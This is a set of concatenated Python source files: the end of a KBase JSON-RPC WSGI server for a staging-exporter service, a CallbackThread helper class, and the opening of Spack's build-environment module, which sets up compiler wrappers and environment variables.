            # log.exception('method %s threw an exception' % request['method'])
            # Exception was raised inside the method.
            # Wrap it in a JSON-RPC server error carrying the traceback.
            newerr = JSONServerError()
            newerr.trace = traceback.format_exc()
            # NOTE(review): e.message / basestring are Python 2 only.
            if isinstance(e.message, basestring):
                newerr.data = e.message
            else:
                # Some exceptions embed other exceptions as the message
                newerr.data = repr(e.message)
            raise newerr
        return result

    def call_py(self, ctx, jsondata):
        """
        Calls jsonrpc service's method and returns its return value in python
        object format or None if there is none.

        This method is same as call() except the return value is a python
        object instead of JSON string. This method is mainly only useful for
        debugging purposes.
        """
        rdata = jsondata
        # we already deserialize the json string earlier in the server code, no
        # need to do it again
        #        try:
        #            rdata = json.loads(jsondata)
        #        except ValueError:
        #            raise ParseError
        # set some default values for error handling
        request = self._get_default_vals()
        if isinstance(rdata, dict) and rdata:
            # It's a single request.
            self._fill_request(request, rdata)
            respond = self._handle_request(ctx, request)
            # Don't respond to notifications
            if respond is None:
                return None
            return respond
        elif isinstance(rdata, list) and rdata:
            # It's a batch: validate/fill all requests first, then execute.
            requests = []
            responds = []
            for rdata_ in rdata:
                # set some default values for error handling
                request_ = self._get_default_vals()
                self._fill_request(request_, rdata_)
                requests.append(request_)
            for request_ in requests:
                respond = self._handle_request(ctx, request_)
                # Don't respond to notifications
                if respond is not None:
                    responds.append(respond)
            if responds:
                return responds
            # Nothing to respond.
            return None
        else:
            # empty dict, list or wrong type
            raise InvalidRequestError

    def _handle_request(self, ctx, request):
        """Handles given request and returns its response."""
        # NOTE(review): dict.has_key is Python 2 only.
        if self.method_data[request['method']].has_key('types'):  # noqa @IgnorePep8
            self._validate_params_types(request['method'], request['params'])
        result = self._call_method(ctx, request)
        # Do not respond to notifications.
        if request['id'] is None:
            return None
        respond = {}
        self._fill_ver(request['jsonrpc'], respond)
        respond['result'] = result
        respond['id'] = request['id']
        return respond
class MethodContext(dict):
    """Per-call context: a dict of request metadata (user, token, module,
    method, provenance, ...) plus logging helpers bound to a biokbase
    logger. Passed as the first argument to every service method."""

    def __init__(self, logger):
        self['client_ip'] = None
        self['user_id'] = None
        self['authenticated'] = None
        self['token'] = None
        self['module'] = None
        self['method'] = None
        self['call_id'] = None
        self['rpc_context'] = None
        self['provenance'] = None
        # Levels (numeric or symbolic) that are passed straight through
        # by log_debug without remapping.
        self._debug_levels = set([7, 8, 9, 'DEBUG', 'DEBUG2', 'DEBUG3'])
        self._logger = logger

    def log_err(self, message):
        self._log(log.ERR, message)

    def log_info(self, message):
        self._log(log.INFO, message)

    def log_debug(self, message, level=1):
        # Accept either a recognized debug level as-is, or an int 1-3
        # which is mapped onto levels 7-9.
        if level in self._debug_levels:
            pass
        else:
            level = int(level)
            if level < 1 or level > 3:
                raise ValueError("Illegal log level: " + str(level))
            level = level + 6
        self._log(level, message)

    def set_log_level(self, level):
        self._logger.set_log_level(level)

    def get_log_level(self):
        return self._logger.get_log_level()

    def clear_log_level(self):
        self._logger.clear_user_log_level()

    def _log(self, level, message):
        # Tag every log line with the per-request identifiers.
        self._logger.log_message(level, message, self['client_ip'],
                                 self['user_id'], self['module'],
                                 self['method'], self['call_id'])

    def provenance(self):
        """Return provenance from the callback server when one is
        configured via SDK_CALLBACK_URL, else the locally recorded list."""
        callbackURL = os.environ.get('SDK_CALLBACK_URL')
        if callbackURL:
            # OK, there's a callback server from which we can get provenance
            arg_hash = {'method': 'CallbackServer.get_provenance',
                        'params': [],
                        'version': '1.1',
                        'id': str(_random.random())[2:]
                        }
            body = json.dumps(arg_hash)
            response = _requests.post(callbackURL, data=body,
                                      timeout=60)
            response.encoding = 'utf-8'
            # A 500 may carry a structured JSON-RPC error body; unwrap it.
            if response.status_code == 500:
                if ('content-type' in response.headers and
                        response.headers['content-type'] ==
                        'application/json'):
                    err = response.json()
                    if 'error' in err:
                        raise ServerError(**err['error'])
                    else:
                        raise ServerError('Unknown', 0, response.text)
                else:
                    raise ServerError('Unknown', 0, response.text)
            if not response.ok:
                response.raise_for_status()
            resp = response.json()
            if 'result' not in resp:
                raise ServerError('Unknown', 0,
                                  'An unknown server error occurred')
            return resp['result'][0]
        else:
            return self.get('provenance')
class ServerError(Exception):
    '''
    The call returned an error. Fields:
    name - the name of the error.
    code - the error code.
    message - a human readable error message.
    data - the server side stacktrace.
    '''

    def __init__(self, name, code, message, data=None, error=None):
        # Bug fix: the super() target must be this class, not Exception --
        # super(Exception, self) starts the MRO lookup *after* Exception
        # and therefore skips Exception.__init__ entirely.
        super(ServerError, self).__init__(message)
        self.name = name
        self.code = code
        self.message = message if message else ''
        self.data = data or error or ''
        # data = JSON RPC 2.0, error = 1.1

    def __str__(self):
        return self.name + ': ' + str(self.code) + '. ' + self.message + \
            '\n' + self.data
def getIPAddress(environ):
    """Best-effort client IP from the WSGI environ, honouring
    X-Forwarded-For / X-Real-IP unless the config opts out of trusting
    those headers."""
    forwarded = environ.get('HTTP_X_FORWARDED_FOR')
    real_ip = environ.get('HTTP_X_REAL_IP')
    # X-headers are trusted unless the config explicitly says otherwise.
    trust_x_headers = config is None or \
        config.get('dont_trust_x_ip_headers') != 'true'
    if trust_x_headers:
        if forwarded:
            # The first entry is the originating client.
            return forwarded.split(',')[0].strip()
        if real_ip:
            return real_ip.strip()
    return environ.get('REMOTE_ADDR')
class Application(object):
    # Wrap the wsgi handler in a class definition so that we can
    # do some initialization and avoid regenerating stuff over
    # and over

    def logcallback(self):
        # Keep the server log pointed at the same file as the user log
        # whenever the user log's file changes.
        self.serverlog.set_log_file(self.userlog.get_log_file())

    def log(self, level, context, message):
        # Log a message tagged with the per-request identifiers.
        self.serverlog.log_message(level, message, context['client_ip'],
                                   context['user_id'], context['module'],
                                   context['method'], context['call_id'])

    def __init__(self):
        submod = get_service_name() or 'kb_staging_exporter'
        self.userlog = log.log(
            submod, ip_address=True, authuser=True, module=True, method=True,
            call_id=True, changecallback=self.logcallback,
            config=get_config_file())
        self.serverlog = log.log(
            submod, ip_address=True, authuser=True, module=True, method=True,
            call_id=True, logfile=self.userlog.get_log_file())
        self.serverlog.set_log_level(6)
        self.rpc_service = JSONRPCServiceCustom()
        self.method_authentication = dict()
        # Register the service methods and their auth requirements.
        self.rpc_service.add(impl_kb_staging_exporter.export_to_staging,
                             name='kb_staging_exporter.export_to_staging',
                             types=[dict])
        self.method_authentication['kb_staging_exporter.export_to_staging'] = 'required'  # noqa
        self.rpc_service.add(impl_kb_staging_exporter.status,
                             name='kb_staging_exporter.status',
                             types=[dict])
        authurl = config.get(AUTH) if config else None
        self.auth_client = _KBaseAuth(authurl)

    def __call__(self, environ, start_response):
        # WSGI entry point: parse the JSON-RPC request body, authenticate,
        # dispatch via the rpc service, and return JSON with CORS headers.
        # Context object, equivalent to the perl impl CallContext
        ctx = MethodContext(self.userlog)
        ctx['client_ip'] = getIPAddress(environ)
        status = '500 Internal Server Error'
        try:
            body_size = int(environ.get('CONTENT_LENGTH', 0))
        except (ValueError):
            body_size = 0
        if environ['REQUEST_METHOD'] == 'OPTIONS':
            # we basically do nothing and just return headers
            status = '200 OK'
            rpc_result = ""
        else:
            request_body = environ['wsgi.input'].read(body_size)
            try:
                req = json.loads(request_body)
            except ValueError as ve:
                err = {'error': {'code': -32700,
                                 'name': "Parse error",
                                 'message': str(ve),
                                 }
                       }
                rpc_result = self.process_error(err, ctx, {'version': '1.1'})
            else:
                # Record call metadata and provenance before dispatch.
                ctx['module'], ctx['method'] = req['method'].split('.')
                ctx['call_id'] = req['id']
                ctx['rpc_context'] = {
                    'call_stack': [{'time': self.now_in_utc(),
                                    'method': req['method']}
                                   ]
                }
                prov_action = {'service': ctx['module'],
                               'method': ctx['method'],
                               'method_params': req['params']
                               }
                ctx['provenance'] = [prov_action]
                try:
                    token = environ.get('HTTP_AUTHORIZATION')
                    # parse out the method being requested and check if it
                    # has an authentication requirement
                    method_name = req['method']
                    auth_req = self.method_authentication.get(
                        method_name, 'none')
                    if auth_req != 'none':
                        if token is None and auth_req == 'required':
                            err = JSONServerError()
                            err.data = (
                                'Authentication required for ' +
                                'kb_staging_exporter ' +
                                'but no authentication header was passed')
                            raise err
                        elif token is None and auth_req == 'optional':
                            pass
                        else:
                            try:
                                user = self.auth_client.get_user(token)
                                ctx['user_id'] = user
                                ctx['authenticated'] = 1
                                ctx['token'] = token
                            except Exception, e:
                                # Bad token is fatal only when auth is
                                # required; 'optional' proceeds anonymous.
                                if auth_req == 'required':
                                    err = JSONServerError()
                                    err.data = \
                                        "Token validation failed: %s" % e
                                    raise err
                    if (environ.get('HTTP_X_FORWARDED_FOR')):
                        self.log(log.INFO, ctx, 'X-Forwarded-For: ' +
                                 environ.get('HTTP_X_FORWARDED_FOR'))
                    self.log(log.INFO, ctx, 'start method')
                    rpc_result = self.rpc_service.call(ctx, req)
                    self.log(log.INFO, ctx, 'end method')
                    status = '200 OK'
                except JSONRPCError as jre:
                    err = {'error': {'code': jre.code,
                                     'name': jre.message,
                                     'message': jre.data
                                     }
                           }
                    trace = jre.trace if hasattr(jre, 'trace') else None
                    rpc_result = self.process_error(err, ctx, req, trace)
                except Exception:
                    err = {'error': {'code': 0,
                                     'name': 'Unexpected Server Error',
                                     'message': 'An unexpected server error ' +
                                                'occurred',
                                     }
                           }
                    rpc_result = self.process_error(err, ctx, req,
                                                    traceback.format_exc())
        # print 'Request method was %s\n' % environ['REQUEST_METHOD']
        # print 'Environment dictionary is:\n%s\n' % pprint.pformat(environ)
        # print 'Request body was: %s' % request_body
        # print 'Result from the method call is:\n%s\n' % \
        #     pprint.pformat(rpc_result)
        if rpc_result:
            response_body = rpc_result
        else:
            response_body = ''
        response_headers = [
            ('Access-Control-Allow-Origin', '*'),
            ('Access-Control-Allow-Headers', environ.get(
                'HTTP_ACCESS_CONTROL_REQUEST_HEADERS', 'authorization')),
            ('content-type', 'application/json'),
            ('content-length', str(len(response_body)))]
        start_response(status, response_headers)
        return [response_body]

    def process_error(self, error, context, request, trace=None):
        # Attach id/version info from the request to the error object,
        # embed the trace per protocol version, log it, and serialize.
        if trace:
            self.log(log.ERR, context, trace.split('\n')[0:-1])
        if 'id' in request:
            error['id'] = request['id']
        if 'version' in request:
            error['version'] = request['version']
            e = error['error'].get('error')
            if not e:
                error['error']['error'] = trace
        elif 'jsonrpc' in request:
            error['jsonrpc'] = request['jsonrpc']
            error['error']['data'] = trace
        else:
            error['version'] = '1.0'
            error['error']['error'] = trace
        return json.dumps(error)

    def now_in_utc(self):
        """Current local time in ISO format with the local UTC offset."""
        # noqa Taken from http://stackoverflow.com/questions/3401428/how-to-get-an-isoformat-datetime-string-including-the-default-timezone @IgnorePep8
        dtnow = datetime.datetime.now()
        dtutcnow = datetime.datetime.utcnow()
        delta = dtnow - dtutcnow
        hh, mm = divmod((delta.days * 24 * 60 * 60 + delta.seconds + 30) // 60,
                        60)
        return "%s%+02d:%02d" % (dtnow.isoformat(), hh, mm)
# The singleton WSGI application served by uwsgi or the dev server below.
application = Application()

# This is the uwsgi application dictionary. On startup uwsgi will look
# for this dict and pull its configuration from here.
# This simply lists where to "mount" the application in the URL path
#
# This uwsgi module "magically" appears when running the app within
# uwsgi and is not available otherwise, so wrap an exception handler
# around it
#
# To run this server in uwsgi with 4 workers listening on port 9999 use:
# uwsgi -M -p 4 --http :9999 --wsgi-file _this_file_
# To run a using the single threaded python BaseHTTP service
# listening on port 9999 by default execute this file
#
try:
    import uwsgi
    # Before we do anything with the application, see if the
    # configs specify patching all std routines to be asynch
    # *ONLY* use this if you are going to wrap the service in
    # a wsgi container that has enabled gevent, such as
    # uwsgi with the --gevent option
    if config is not None and config.get('gevent_monkeypatch_all', False):
        print "Monkeypatching std libraries for async"
        from gevent import monkey
        monkey.patch_all()
    uwsgi.applications = {'': application}
except ImportError:
    # Not available outside of wsgi, ignore
    pass

# Handle to the background server Process created by
# start_server(newprocess=True); None while no server is running.
_proc = None
def start_server(host='localhost', port=0, newprocess=False):
    '''
    By default, will start the server on localhost on a system assigned port
    in the main thread. Execution of the main thread will stay in the server
    main loop until interrupted. To run the server in a separate process, and
    thus allow the stop_server method to be called, set newprocess = True. This
    will also allow returning of the port number.'''
    global _proc
    if _proc:
        raise RuntimeError('server is already running')
    httpd = make_server(host, port, application)
    # port=0 asks the OS for a free port; read back the one actually bound.
    port = httpd.server_address[1]
    print "Listening on port %s" % port
    if newprocess:
        # Serve in a daemon child process so the caller keeps running and
        # can later call stop_server().
        _proc = Process(target=httpd.serve_forever)
        _proc.daemon = True
        _proc.start()
    else:
        # Blocks until interrupted.
        httpd.serve_forever()
    return port
def stop_server():
    """Stop a server previously started with start_server(newprocess=True).

    Bug fix: made safe to call when no server is running -- the original
    unconditionally called ``_proc.terminate()`` and raised AttributeError
    when ``_proc`` was None.
    """
    global _proc
    if _proc is None:
        return
    _proc.terminate()
    _proc = None
def process_async_cli(input_file_path, output_file_path, token):
    """Execute one JSON-RPC request from a file and write the response.

    Used for asynchronous CLI execution: reads the request from
    ``input_file_path``, runs it against the service with an optional auth
    ``token``, and writes the JSON response to ``output_file_path``.

    Returns 0 on success and 500 when the response carries an error.
    """
    exit_code = 0
    with open(input_file_path) as data_file:
        req = json.load(data_file)
    # Fill in JSON-RPC boilerplate the caller may have omitted.
    if 'version' not in req:
        req['version'] = '1.1'
    if 'id' not in req:
        req['id'] = str(_random.random())[2:]
    ctx = MethodContext(application.userlog)
    if token:
        user = application.auth_client.get_user(token)
        ctx['user_id'] = user
        ctx['authenticated'] = 1
        ctx['token'] = token
    if 'context' in req:
        ctx['rpc_context'] = req['context']
    ctx['CLI'] = 1
    ctx['module'], ctx['method'] = req['method'].split('.')
    prov_action = {'service': ctx['module'], 'method': ctx['method'],
                   'method_params': req['params']}
    ctx['provenance'] = [prov_action]
    resp = None
    try:
        resp = application.rpc_service.call_py(ctx, req)
    except JSONRPCError as jre:
        trace = jre.trace if hasattr(jre, 'trace') else None
        resp = {'id': req['id'],
                'version': req['version'],
                'error': {'code': jre.code,
                          'name': jre.message,
                          'message': jre.data,
                          'error': trace}
                }
    except Exception:
        trace = traceback.format_exc()
        resp = {'id': req['id'],
                'version': req['version'],
                'error': {'code': 0,
                          'name': 'Unexpected Server Error',
                          'message': 'An unexpected server error occurred',
                          'error': trace}
                }
    # Bug fix: call_py returns None for notifications, so the original
    # unguarded `'error' in resp` raised TypeError in that case.
    if resp is not None and 'error' in resp:
        exit_code = 500
    with open(output_file_path, "w") as f:
        f.write(json.dumps(resp, cls=JSONObjectEncoder))
    return exit_code
if __name__ == "__main__":
    # Async-CLI mode: <script> <input.json> <output.json> [token|token-file]
    if (len(sys.argv) >= 3 and len(sys.argv) <= 4 and
            os.path.isfile(sys.argv[1])):
        token = None
        if len(sys.argv) == 4:
            # The third argument is either a file containing the token or
            # the token itself.
            if os.path.isfile(sys.argv[3]):
                with open(sys.argv[3]) as token_file:
                    token = token_file.read()
            else:
                token = sys.argv[3]
        sys.exit(process_async_cli(sys.argv[1], sys.argv[2], token))
    # Server mode: parse --host/--port and run the dev WSGI server.
    try:
        opts, args = getopt(sys.argv[1:], "", ["port=", "host="])
    except GetoptError as err:
        # print help information and exit:
        print str(err)  # will print something like "option -a not recognized"
        sys.exit(2)
    port = 9999
    host = 'localhost'
    for o, a in opts:
        if o == '--port':
            port = int(a)
        elif o == '--host':
            host = a
            print "Host set to %s" % host
        else:
            assert False, "unhandled option"
    start_server(host=host, port=port)
#    print "Listening on port %s" % port
#    httpd = make_server( host, port, application)
#
#    httpd.serve_forever()
|
callback_thread.py | from threading import Thread
from typing import Any, Iterable, Mapping
from types_extensions import Function, void, safe_type
class CallbackThread(Thread):
    """
    An extension to python's threading API allowing for a callback to be executed upon completion of the given
    function. The callback is executed with the initial function's return value as the first parameter and any other
    given args and kwargs following.

    Usage:

    >>> def callback_func(x: int, y: int) -> None:
    >>>
    >>>     print(f'Called with {x=} and {y=}.')
    >>>
    >>> def func(x: int) -> int:
    >>>     return x + 1

    >>> thread_ = CallbackThread(target=func, kwargs={'x': 10}, callback=callback_func, callback_extra_args=(7,))
    >>> thread_.start()
    >>> thread_.join()
    ----
    Called with x=11 and y=7.
    """

    def __init__(self, group: void = None, target: Function = None, name: str = None,
                 args: Iterable[Any] = (), kwargs: Mapping[str, Any] = None, *, daemon: bool = None,
                 callback: Function = None, callback_extra_args: Iterable[Any] = (),
                 callback_extra_kwargs: Mapping[str, Any] = None) -> void:
        Thread.__init__(self, group=group, target=target, name=name,
                        args=args, kwargs=kwargs, daemon=daemon)
        # Re-bind the private attributes Thread.__init__ already set so the
        # overridden run() below owns them, and record the callback state.
        self._target: Function = target
        self._args: Iterable[Any] = args
        self._kwargs: safe_type(Mapping[str, Any]) = kwargs or {}
        self._callback: Function = callback
        self._callback_extra_args: Iterable[Any] = callback_extra_args
        self._callback_extra_kwargs: safe_type(Mapping[str, Any]) = callback_extra_kwargs or {}

    def run(self) -> void:
        """Run the target, then invoke the callback with its return value.

        Bug fix: the attribute cleanup now sits in a ``finally`` block,
        mirroring CPython's ``Thread.run``, so target/args references are
        released (avoiding reference cycles) even when the target or the
        callback raises.
        """
        try:
            if self._target:
                return_value = self._target(*self._args, **self._kwargs)
                if self._callback:
                    self._callback(return_value, *self._callback_extra_args, **self._callback_extra_kwargs)
        finally:
            # Break reference cycles if the target holds a reference to
            # this thread instance.
            del self._target, self._args, self._kwargs
|
build_environment.py | # Copyright 2013-2020 Lawrence Livermore National Security, LLC and other
# Spack Project Developers. See the top-level COPYRIGHT file for details.
#
# SPDX-License-Identifier: (Apache-2.0 OR MIT)
"""
This module contains all routines related to setting up the package
build environment. All of this is set up by package.py just before
install() is called.
There are two parts to the build environment:
1. Python build environment (i.e. install() method)
This is how things are set up when install() is called. Spack
takes advantage of each package being in its own module by adding a
bunch of command-like functions (like configure(), make(), etc.) in
the package's module scope. Ths allows package writers to call
them all directly in Package.install() without writing 'self.'
everywhere. No, this isn't Pythonic. Yes, it makes the code more
readable and more like the shell script from which someone is
likely porting.
2. Build execution environment
This is the set of environment variables, like PATH, CC, CXX,
etc. that control the build. There are also a number of
environment variables used to pass information (like RPATHs and
other information about dependencies) to Spack's compiler wrappers.
All of these env vars are also set up here.
Skimming this module is a nice way to get acquainted with the types of
calls you can make from within the install() function.
"""
import re
import multiprocessing
import os
import shutil
import sys
import traceback
import types
from six import StringIO
import llnl.util.tty as tty
from llnl.util.tty.color import cescape, colorize
from llnl.util.filesystem import mkdirp, install, install_tree
from llnl.util.lang import dedupe
import spack.build_systems.cmake
import spack.build_systems.meson
import spack.config
import spack.main
import spack.paths
import spack.package
import spack.schema.environment
import spack.store
import spack.install_test
import spack.architecture as arch
import spack.util.path
from spack.util.string import plural
from spack.util.environment import (
env_flag, filter_system_paths, get_path, is_system_path,
EnvironmentModifications, validate, preserve_environment)
from spack.util.environment import system_dirs, inspect_path
from spack.error import NoLibrariesError, NoHeadersError
from spack.util.executable import Executable
from spack.util.module_cmd import load_module, path_from_modules, module
from spack.util.log_parse import parse_log_events, make_log_context
#
# This can be set by the user to globally disable parallel builds.
#
SPACK_NO_PARALLEL_MAKE = 'SPACK_NO_PARALLEL_MAKE'
#
# These environment variables are set by
# set_build_environment_variables and used to pass parameters to
# Spack's compiler wrappers.
#
SPACK_ENV_PATH = 'SPACK_ENV_PATH'
SPACK_INCLUDE_DIRS = 'SPACK_INCLUDE_DIRS'
SPACK_LINK_DIRS = 'SPACK_LINK_DIRS'
SPACK_RPATH_DIRS = 'SPACK_RPATH_DIRS'
SPACK_RPATH_DEPS = 'SPACK_RPATH_DEPS'
SPACK_LINK_DEPS = 'SPACK_LINK_DEPS'
SPACK_PREFIX = 'SPACK_PREFIX'
SPACK_INSTALL = 'SPACK_INSTALL'
SPACK_DEBUG = 'SPACK_DEBUG'
SPACK_SHORT_SPEC = 'SPACK_SHORT_SPEC'
SPACK_DEBUG_LOG_ID = 'SPACK_DEBUG_LOG_ID'
SPACK_DEBUG_LOG_DIR = 'SPACK_DEBUG_LOG_DIR'
SPACK_CCACHE_BINARY = 'SPACK_CCACHE_BINARY'
SPACK_SYSTEM_DIRS = 'SPACK_SYSTEM_DIRS'
# Platform-specific library suffix.
# macOS shared libraries use '.dylib'; other platforms are assumed ELF ('.so').
dso_suffix = 'dylib' if sys.platform == 'darwin' else 'so'
class MakeExecutable(Executable):
    """Callable executable object for ``make`` that understands per-call
    parallelism.

    Passing ``parallel`` to a call overrides the package-wide setting, so
    a package can default either way and override individual invocations.
    Passing ``jobs_env`` names an environment variable that receives the
    parallelism level (without changing the normal ``-j`` invocation).

    Note that if the SPACK_NO_PARALLEL_MAKE env var is set it overrides
    everything.
    """

    def __init__(self, name, jobs):
        super(MakeExecutable, self).__init__(name)
        self.jobs = jobs

    def __call__(self, *args, **kwargs):
        """Swallow ``parallel`` and ``jobs_env`` from kwargs; all other
        arguments are forwarded to the superclass call."""
        globally_disabled = env_flag(SPACK_NO_PARALLEL_MAKE)
        # NOTE: the kwargs.pop only happens when parallel make is not
        # globally disabled, preserving the original short-circuit.
        run_parallel = (not globally_disabled) and \
            kwargs.pop('parallel', self.jobs > 1)
        if run_parallel:
            args = ('-j{0}'.format(self.jobs),) + args

        env_var = kwargs.pop('jobs_env', None)
        if env_var:
            # Caller wants the parallelism level exported through an
            # environment variable.
            kwargs['extra_env'] = {env_var: str(self.jobs)}

        return super(MakeExecutable, self).__call__(*args, **kwargs)
def clean_environment():
    """Sanitize the build environment of user settings that could
    interfere with builds. Applied immediately, unlike the other setup
    functions, so it does not clobber what the modules load."""
    env = EnvironmentModifications()

    # Library/include search paths can make packages pick up unintended
    # external dependencies, so drop them during the build.
    for name in ('LD_LIBRARY_PATH', 'LIBRARY_PATH', 'CPATH',
                 'LD_RUN_PATH', 'DYLD_LIBRARY_PATH',
                 'DYLD_FALLBACK_LIBRARY_PATH'):
        env.unset(name)

    # On Cray "cluster" systems, unset CRAY_LD_LIBRARY_PATH to avoid
    # interference with Spack dependencies.
    # CNL requires these variables to be set (or at least some of them,
    # depending on the CNL version).
    hostarch = arch.Arch(arch.platform(), 'default_os', 'default_target')
    on_cray = str(hostarch.platform) == 'cray'
    using_cnl = re.match(r'cnl\d+', str(hostarch.os))
    if on_cray and not using_cnl:
        env.unset('CRAY_LD_LIBRARY_PATH')
        for name in os.environ.keys():
            if 'PKGCONF' in name:
                env.unset(name)

    # Variables that can affect installation of Autotools and CMake
    # packages, followed by MPI wrapper variables that should only be
    # set by mpi providers for packages with mpi dependencies.
    for name in ('CC', 'CFLAGS', 'CPP', 'CPPFLAGS',      # C variables
                 'CXX', 'CCC', 'CXXFLAGS', 'CXXCPP',     # C++ variables
                 'F77', 'FFLAGS', 'FLIBS',               # Fortran77 variables
                 'FC', 'FCFLAGS', 'FCLIBS',              # Fortran variables
                 'LDFLAGS', 'LIBS',                      # linker variables
                 'MPICC', 'MPICXX', 'MPIFC', 'MPIF77', 'MPIF90'):
        env.unset(name)

    build_lang = spack.config.get('config:build_language')
    if build_lang:
        # Override language-related variables. This can be used to force
        # English compiler messages etc., which allows parse_log_events to
        # show useful matches.
        env.set('LC_ALL', build_lang)

    # Remove any macports installs from the PATH. The macports ld can
    # cause conflicts with the built-in linker on el capitan. Solves
    # assembler issues, e.g.:
    #    suffix or operands invalid for `movq'"
    for entry in get_path('PATH'):
        if '/macports/' in entry:
            env.remove_path('PATH', entry)

    env.apply_modifications()
def set_compiler_environment_variables(pkg, env):
    """Set compiler-related variables for building ``pkg``: CC/CXX/F77/FC
    pointing at Spack's wrappers, SPACK_* variables consumed by those
    wrappers (real compilers, rpath args, dtags, target flags, injected
    compiler flags). Mutates and returns ``env``."""
    assert pkg.spec.concrete
    compiler = pkg.compiler
    spec = pkg.spec

    # Make sure the executables for this compiler exist
    compiler.verify_executables()

    # Set compiler variables used by CMake and autotools
    assert all(key in compiler.link_paths for key in (
        'cc', 'cxx', 'f77', 'fc'))

    # Populate an object with the list of environment modifications
    # and return it
    # TODO : add additional kwargs for better diagnostics, like requestor,
    # ttyout, ttyerr, etc.
    link_dir = spack.paths.build_env_path

    # Set SPACK compiler variables so that our wrapper knows what to call
    if compiler.cc:
        env.set('SPACK_CC', compiler.cc)
        env.set('CC', os.path.join(link_dir, compiler.link_paths['cc']))
    if compiler.cxx:
        env.set('SPACK_CXX', compiler.cxx)
        env.set('CXX', os.path.join(link_dir, compiler.link_paths['cxx']))
    if compiler.f77:
        env.set('SPACK_F77', compiler.f77)
        env.set('F77', os.path.join(link_dir, compiler.link_paths['f77']))
    if compiler.fc:
        env.set('SPACK_FC', compiler.fc)
        env.set('FC', os.path.join(link_dir, compiler.link_paths['fc']))

    # Set SPACK compiler rpath flags so that our wrapper knows what to use
    env.set('SPACK_CC_RPATH_ARG', compiler.cc_rpath_arg)
    env.set('SPACK_CXX_RPATH_ARG', compiler.cxx_rpath_arg)
    env.set('SPACK_F77_RPATH_ARG', compiler.f77_rpath_arg)
    env.set('SPACK_FC_RPATH_ARG', compiler.fc_rpath_arg)
    env.set('SPACK_LINKER_ARG', compiler.linker_arg)

    # Check whether we want to force RPATH or RUNPATH
    if spack.config.get('config:shared_linking') == 'rpath':
        env.set('SPACK_DTAGS_TO_STRIP', compiler.enable_new_dtags)
        env.set('SPACK_DTAGS_TO_ADD', compiler.disable_new_dtags)
    else:
        env.set('SPACK_DTAGS_TO_STRIP', compiler.disable_new_dtags)
        env.set('SPACK_DTAGS_TO_ADD', compiler.enable_new_dtags)

    # Set the target parameters that the compiler will add
    isa_arg = spec.architecture.target.optimization_flags(compiler)
    env.set('SPACK_TARGET_ARGS', isa_arg)

    # Trap spack-tracked compiler flags as appropriate.
    # env_flags are easy to accidentally override.
    inject_flags = {}
    env_flags = {}
    build_system_flags = {}
    for flag in spack.spec.FlagMap.valid_compiler_flags():
        # Always convert flag_handler to function type.
        # This avoids discrepencies in calling conventions between functions
        # and methods, or between bound and unbound methods in python 2.
        # We cannot effectively convert everything to a bound method, which
        # would be the simpler solution.
        if isinstance(pkg.flag_handler, types.FunctionType):
            handler = pkg.flag_handler
        else:
            if sys.version_info >= (3, 0):
                handler = pkg.flag_handler.__func__
            else:
                handler = pkg.flag_handler.im_func

        injf, envf, bsf = handler(pkg, flag, spec.compiler_flags[flag])
        inject_flags[flag] = injf or []
        env_flags[flag] = envf or []
        build_system_flags[flag] = bsf or []

    # Place compiler flags as specified by flag_handler
    for flag in spack.spec.FlagMap.valid_compiler_flags():
        # Concreteness guarantees key safety here
        if inject_flags[flag]:
            # variables SPACK_<FLAG> inject flags through wrapper
            var_name = 'SPACK_{0}'.format(flag.upper())
            env.set(var_name, ' '.join(f for f in inject_flags[flag]))
        if env_flags[flag]:
            # implicit variables
            env.set(flag.upper(), ' '.join(f for f in env_flags[flag]))
    pkg.flags_to_build_system_args(build_system_flags)

    env.set('SPACK_COMPILER_SPEC', str(spec.compiler))

    env.set('SPACK_SYSTEM_DIRS', ':'.join(system_dirs))

    compiler.setup_custom_environment(pkg, env)

    return env
def set_build_environment_variables(pkg, env, dirty):
    """Ensure a clean install environment when we build packages.

    This involves unsetting pesky environment variables that may
    affect the build. It also involves setting environment variables
    used by Spack's compiler wrappers.

    Args:
        pkg: The package we are building
        env: The build environment
        dirty (bool): Skip unsetting the user's environment settings

    NOTE(review): ``dirty`` is documented but not referenced anywhere in
    this body -- confirm whether it is consumed elsewhere or vestigial.
    """
    # Gather information about various types of dependencies
    build_deps = set(pkg.spec.dependencies(deptype=('build', 'test')))
    link_deps = set(pkg.spec.traverse(root=False, deptype=('link')))
    build_link_deps = build_deps | link_deps
    rpath_deps = get_rpath_deps(pkg)

    link_dirs = []
    include_dirs = []
    rpath_dirs = []

    # The top-level package is always RPATHed. It hasn't been installed yet
    # so the RPATHs are added unconditionally (e.g. even though lib64/ may
    # not be created for the install).
    for libdir in ['lib', 'lib64']:
        lib_path = os.path.join(pkg.prefix, libdir)
        rpath_dirs.append(lib_path)

    # Set up link, include, RPATH directories that are passed to the
    # compiler wrapper
    for dep in link_deps:
        if is_system_path(dep.prefix):
            continue
        query = pkg.spec[dep.name]
        dep_link_dirs = list()
        try:
            dep_link_dirs.extend(query.libs.directories)
        except NoLibrariesError:
            tty.debug("No libraries found for {0}".format(dep.name))

        # Fall back to conventional lib/lib64 subdirs when no libs were
        # reported by the spec query.
        for default_lib_dir in ['lib', 'lib64']:
            default_lib_prefix = os.path.join(dep.prefix, default_lib_dir)
            if os.path.isdir(default_lib_prefix):
                dep_link_dirs.append(default_lib_prefix)

        link_dirs.extend(dep_link_dirs)
        if dep in rpath_deps:
            rpath_dirs.extend(dep_link_dirs)

        try:
            include_dirs.extend(query.headers.directories)
        except NoHeadersError:
            tty.debug("No headers found for {0}".format(dep.name))

    link_dirs = list(dedupe(filter_system_paths(link_dirs)))
    include_dirs = list(dedupe(filter_system_paths(include_dirs)))
    rpath_dirs = list(dedupe(filter_system_paths(rpath_dirs)))

    env.set(SPACK_LINK_DIRS, ':'.join(link_dirs))
    env.set(SPACK_INCLUDE_DIRS, ':'.join(include_dirs))
    env.set(SPACK_RPATH_DIRS, ':'.join(rpath_dirs))

    build_prefixes = [dep.prefix for dep in build_deps]
    build_link_prefixes = [dep.prefix for dep in build_link_deps]

    # add run-time dependencies of direct build-time dependencies:
    for build_dep in build_deps:
        for run_dep in build_dep.traverse(deptype='run'):
            build_prefixes.append(run_dep.prefix)

    # Filter out system paths: ['/', '/usr', '/usr/local']
    # These paths can be introduced into the build when an external package
    # is added as a dependency. The problem with these paths is that they often
    # contain hundreds of other packages installed in the same directory.
    # If these paths come first, they can overshadow Spack installations.
    build_prefixes = filter_system_paths(build_prefixes)
    build_link_prefixes = filter_system_paths(build_link_prefixes)

    # Add dependencies to CMAKE_PREFIX_PATH
